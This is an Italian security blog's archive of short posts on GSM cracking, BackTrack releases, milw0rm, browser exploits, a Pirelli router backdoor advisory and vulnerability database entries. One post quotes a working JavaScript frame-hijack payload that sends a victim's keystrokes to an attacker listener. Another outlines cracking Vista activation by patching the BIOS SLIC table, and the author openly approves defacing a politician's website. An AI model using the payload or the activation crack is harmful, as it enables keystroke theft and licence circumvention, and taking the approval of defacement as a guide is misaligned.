freeuser.org

Il CCC come sempre ci regala delle chicche che vanno ben oltre i regali ricevuti nel passato natale :) Che gli algoritmi A5/1 e A5/3 fossero andati a farsi benedire lo sapevamo già da tempo ( http://freeuser.org/gsm-cypher-is-gone-crackato-kaput/ ) ma come in tutte le vulnerabilità che si rispettino non sempre il fatto in se genera allarmi da Defcon 3. Tuttavia... I problemi nascono quando di mescolano: - un cellulare da 15$ con sopra un firmware opensource (OSMocombb - http://bb.osmocom.org/trac/ ) - delle rainbowtable http://srlabs.de/research/decrypting_gsm/ - qualche scheda FPGA - 3 minuti - tanto, tanto, tanto ingegno Slide PDF - http://events.ccc.de/congress/2010/Fahrplan/attachments/1783_101228.27 C3.GSM-Sniffing.Nohl_Munaut.pdf Want to listen in on cellphone calls or intercept test messages? Well that’s a violation of someone else’s privacy so shame on you! But there are black-hats who want to do just that and it may not be quite as difficult as you think. ...

Ed eccola qui in tutto il suo splendore Debian Based, prima la beta p0i la pre-final e ora le versione definitiva (ma andrebbe tra apici) Non aggiungo nient'altro perché se veramente non la conoscete, beh mi spiace per voi! XD Scherzi a parte rinnovo l'invito, agli appassionati, di fare un salto su Server : irc.freenode.net Room Italiana : #backtrack.it Room Internazionale : #remote-exploit A tutti gli altri consiglio almeno un download Descrizione : DVD Image Nome : bt4-final.iso Grandezza : 1570 MB MD5 : af139d2a085978618dc53cabc67b9269 Downloads Torrent Design DVD:  Downloads Complimenti vivissimi ai sempre attivi membri del team italiano [Via backtrack.it ]

E' bello riavere milw0rm tra noi :) Firefox 3.5 Heap Spray Vulnerabilty Author: SBerry aka Simon Berry-Byrne Thanks to HD Moore for the insight and Metasploit for the payload Loremipsumdoloregkuw Loremipsumdoloregkuwiert Loremikdkw # milw0rm.com [2009-07-13] via Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit . Qui la PoC

Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past. Be safe, /str0ke [Via milw0rm - Home Page Header ] Sinceramente comincio ad essere in apprensione... Prima hack.co.za , ora milw0rm.com certo che il tempo passa! @/str0ke: Good work man! Don't take care about "other" ppl! Go on your way and good luck! EDIT: Ore 2009/07/09 18.55 CEST milw0rm torna UP EDIT2: Il suo addio a milw0rm era motivato da una grave malattia cardiaca che purtroppo ce lo ha sottratto anzi tempo. Addio str0ke R.I.P. Edit2bis: I'm not dead yet, just being trolled

Sto seguendo la nuova BT4 da molto tempo e da febbraio ho incominciato a rovistare per bene dentro la distro. Ho avuto il piacere di conoscere i ragazzi che stanno dietro la community italiana di BT - backtrack.it al Security Summit di Roma e devo dire che si sono dati da fare molto in questi tempi per spingere BT4 nella fase di pre Final (testimonio il fermento sull'IRC chan ;) ) Server : irc.freenode.net Room Italiana : #backtrack.it Room Internazionale : #remote-exploit Ed è con piacere che oggi (anche se con un pò di ritardo sul mainstream) vi comunico che la pre release di BT è disponibile per il download . The Remote Exploit Team is ecstatic to announce the public release of BackTrack 4 Pre Final (codename “pwnsauce“). A VMWare Image of BT4 will be released in a few days. We have major changes in BackTrack, and have tried to document and summarize them as best as possible. See the BackTrack Guide PDF for more info. [Via Offensive Security ] Riferimenti per la ISO Descriz...

Edit : E' uscita BT4 - Pre Final , codename: pwnsauce Il Remote Exploit Development Team ha da poco emanato l'annuncio della BackTrack 4 Beta . Chi non la conosce o non l'ha mai sentita nominare è messo in castigo per 1 anno. A detta di chi l'ha usata, nonostante sia in beta, la distro sembra essere stabile ed usabile e, udite udite... finalmente è basata su Debian (utilizzano Ubuntu come punto di partenza, quale version però non mi è dato ancora sapere). Tra le tonnellate di funzionalità annunciate (non ancora pubblicate ufficialmente) menzioniamo il supporto nativo per le Pico card. Finalmente potremmo farci on demand le nostre maledette (e pesantissime) Rainbow Table utilizzando l' FPGA di turno e "sbirciare" un pò più agilmente dentro WPA, GSM e Bluetooth. Sento puzza d'acquisto (e ovviamente mi riferisco alla pico card visto che BT è opensource) :) BackTrack ISO e l'immagine VMWare disponibili qui . hack a day imperat !

Giulio Tremonti Fossero così efficienti nel lavorare per il NOSTRO paese non ci sarebbe di che protestare, invece... L' idea forse è stata buona, quella del deface intendo, peccato che il web non è di massa, pensate a quanto s'inca*BIP*erebbero se uno gli oscurasse qualche canale TV ... ! EDIT : Mirroriamolo per i posteri ;)

Ecco come appariva il sito di Giulio Tremonti pochi minuti fa: Sito di Tremonti - Defaced Un modo di fare protesta che non solo mi sento di approvare ma quasi anche d'appoggiare. Contro i manganelli del sano e vecchio hacking! PS: Si ringrazia Michele per la segnalazione :) EDIT : Zone-H non perdona! ;)

Sapevo che il pirellone bianco ci abbandonava (anche quello nero) ... Discovered embedded backdoor to activate telnet/ftp/tftp/web extended admin interface with Admin privileges, from internal network lan on Alice ADSL CPE Modem/Router, manufactered by Pirelli based on Broadcom platform. Dettagli Router Vendor : Alice Telecom Italia CPE Modem/Routers manufactered by Pirelli based on Broadcom platform. Model Affected : AGA[Alice Gate2 plus Wi-Fi] AGB[Alice Gate2plus] AG2P-AG3[Alice Gate W2+] AGPV-AGPF[Alice Gate VoIP 2 Plus Wi-Fi] Firmware Version : All AGA/AGB/AG2P-AG3/AGPV-AGPF firmware version are affected. Platforms : Customized Linux version 2.6.8.1 on BroadcomBCM96348 chipset. Vulnerability : enable telnet/ftp/tftp and web-admin frominternal lan. Exploitation : internal network lan, versus Router Date : 13 Oct 2008 Authors : saxdax & drpepperONE e-mail : saxdax2@gmail.com, drpepppperone@gmail.com Risk : medium > low ( opinabile ndr ) [Via Telecom Italia Alice Pirelli router...

Reblogged Boxee è un insieme di patch che modificano il software di Apple TV e la rendono capace di riprodurre praticamente tutti i file multimediali non protetti da DRM. A differenza di altri , la facilità d’esecuzione di questo hack è tale da rendere l’esperimento perfino divertente. Prima di tutto, è necessario ottenere l’invito per provare il software compilando i compilando la richiesta a questa pagina . Poi, è sufficiente eseguire il download dell’utility Atvusb-creator , scegliere l’opzione ATV-Patchstick e selezionare Boxee For Mac nel Menu a tendina. Dopodiché, si inserisce un pen drive USB nel Mac e si da inizio alla creazione della patch vera e propria. Una volta che il pen-drive è pronto, lo si collega all’Apple TV e si riavvia il dispositivo: apparirà una schermata in cui selezionare Boxee , ed infine Update ; in questo modo verrà scaricato e installato il software automaticamente da Internet. D’ora in avanti, il menu Boxee sarà disponibile nell’interfaccia di Apple TV ...

Quando la botnet diventa un prodotto Non sono un ingegnere del software o meglio, non faccio dell'ingegneria del software il cuore del mio lavoro. Tuttavia mi ha appassionato e mi appassiona molto questo importante branch del mondo dell'informatica tant'è che qualcuno negli anni si è anche preso la bega di assegnarmi il laboratorio di Ingegneria in un corso la laurea (ahimè cosa che non accadrà più in futuro). Se avete mai messo mano al mondo degli Unified Process vi sarà sicuramente capitato sotto gli occhi un trito e ritrito diagramma riepilogativo sullo stile di quello che segue ... bene! Mai avrei immaginato che una simil logica potesse mai essere applicata al mondo del Cybercrime . Pensateci dopo tutto è abbastanza semplice! Io criminale informatico (o meglio associazioni di ...) vendo servizi, siano essi: spam, ddos on demand, phishing e/o scam di vario tipo. Ho la necessità di facilitare quelli che sono i "normali" task della mia attività quotidiana. Gli ...

Da un pò di tempo sto guardando al mondo dell'hacking da un punto di vista prettamente sociale . Se qualche anno fa il termine hacker assumeva il significato di "cultore di materia" o di "curioso appassionato" oggi non è più propriamente vero. Il progetto HPP tenta di creare un pò d'ordine, facendo spuntare altri termini e definendo in maniera assoluta (come se ce ne fosse bisogno) la figura dell' " Ethical Hacker ". E che centra Uplink ? Beh avete presente quando ripensate al passato? Ad un evento abbastanza indietro nel tempo tale da farvi tornare alla mente cose che credevate dimenticate?! Uplink è stato il mio "gateway". Mi ricordo di quando ero ancora uno script kiddie e il mio pane quotidiano erano IRCnet , EfNET e hack.co.za , anzi hack.co.za txt version. Quando avevo una connessione analogica a 33.6 con un ISP di Cupramarittima (non Jonhatan di SBT) ed utilizzavo il mio fidato US Robotics V.92 (di cui abbiamo una diapo...

Reblogged Condivisi da Andrea Lazzari ... sarà l'effetto "open" o l'effetto accanimento? Tutto serve a migliorare cmq ;) Google Chrome Browser version 0.2.149.27 suffers from a denial of service crash vulnerability when mishandling a malicious link. Proof of concept code included. Qui il riferimento originale

Reblogged Condivisi da Andrea Lazzari Cominciamo subito subito :) Google Chrome Browser version 0.2.149.27 automatic file download exploit. Qui il riferimento originale

Reblogged Questo lo provo ... Qui il riferimento originale

This way, we bypass IE’s protection and set our desired location without any problems. And the final exploit goes like this: javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return 'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1); What caballero-listener does is just focusing itself, so it can catches onkeydown events.. there are a lot of ways of making the same thing in more stealth mode. Ghost Busters | GNUCITIZEN Vi fornisco direttamente il digest ;)

EDIT: La provedura riportata qui sotto è stata modificata con una più efficiente. Maggiori informazioni a questo link . Shared by Andrea Lazzari Come costruirsi una versione originale di Vista con un "semplice" Hex editor :) Sotto suggerimento di un collega di lavoro Viva Vista! :D A new way to crack or bypass Windows Vista activation is by installing OEM version of Vista on your PC. However, Windows Vista OEM activation needs a new table named SLIC in ACPI module of computer BIOS, and new values in RSTD table, as part of SLP 2.0 (System-Locked Preinstallation). If your motherboard or BIOS ACPI module does not contains the SLIC table, you will need to modify or patch the BIOS to add in the table , plus set a correct OEM ID and OEM Table ID that match the corresponding OEM digital certificate. After modification, you can install Windows Vista with OEM product key and has Windows Vista activated instantly without the need to activate online, as if your Vista system is OEM ver...

Shared by Andrea Lazzari La filiera dell'hacking cinese Used this chart was from IT Rising’s 2007 report on the computer virus epidemic: To create this crappier but English version of the chart: >Qui il riferimento originale

OSVDB-ID:  44969  -  http://osvdb.org/show/osvdb/44969 Description <em style='font-weight:bold;'>(Description Provided by <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-5208" target="_blank">CVE</a>)</em> : SQL injection vulnerability in sub_votepic.php in the Datsogallery (com_datsogallery) module 1.6 for Joomla! allows remote attackers to execute arbitrary SQL commands via the User-Agent HTTP header. Classification Location: Remote / Network Access Attack Type: Information Disclosure, Input Manipulation Impact: Loss of Confidentiality, Loss of Integrity Exploit: Exploit Public Disclosure: Uncoordinated Disclosure OSVDB: Web Related Products Unknown or Incomplete [Via -  http://www.exploit-db.com/exploits/5583/ ]

The Oracle Application Server Portal 10G suffers from an authentication bypass vulnerability. Details are provided. [Via - http://packetstormsecurity.org/filedesc/oracleasp-bypass.txt.html ]